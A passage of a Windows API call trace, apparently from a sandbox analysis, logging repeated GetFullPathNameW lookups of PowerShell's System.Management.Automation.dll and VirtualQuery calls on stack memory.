	[0382.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.960] VirtualQuery (in: lpAddress=0x24af50, lpBuffer=0x24be10, dwLength=0x30 | out: lpBuffer=0x24be10*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.960] VirtualQuery (in: lpAddress=0x24afe0, lpBuffer=0x24bea0, dwLength=0x30 | out: lpBuffer=0x24bea0*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.962] VirtualQuery (in: lpAddress=0x24af50, lpBuffer=0x24be10, dwLength=0x30 | out: lpBuffer=0x24be10*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.962] VirtualQuery (in: lpAddress=0x24afe0, lpBuffer=0x24bea0, dwLength=0x30 | out: lpBuffer=0x24bea0*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.962] VirtualQuery (in: lpAddress=0x24af50, lpBuffer=0x24be10, dwLength=0x30 | out: lpBuffer=0x24be10*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.962] VirtualQuery (in: lpAddress=0x24afe0, lpBuffer=0x24bea0, dwLength=0x30 | out: lpBuffer=0x24bea0*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.964] VirtualQuery (in: lpAddress=0x24b9f0, lpBuffer=0x24c8b0, dwLength=0x30 | out: lpBuffer=0x24c8b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.966] VirtualQuery (in: lpAddress=0x24b9f0, lpBuffer=0x24c8b0, dwLength=0x30 | out: lpBuffer=0x24c8b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.968] VirtualQuery (in: lpAddress=0x24b9f0, lpBuffer=0x24c8b0, dwLength=0x30 | out: lpBuffer=0x24c8b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
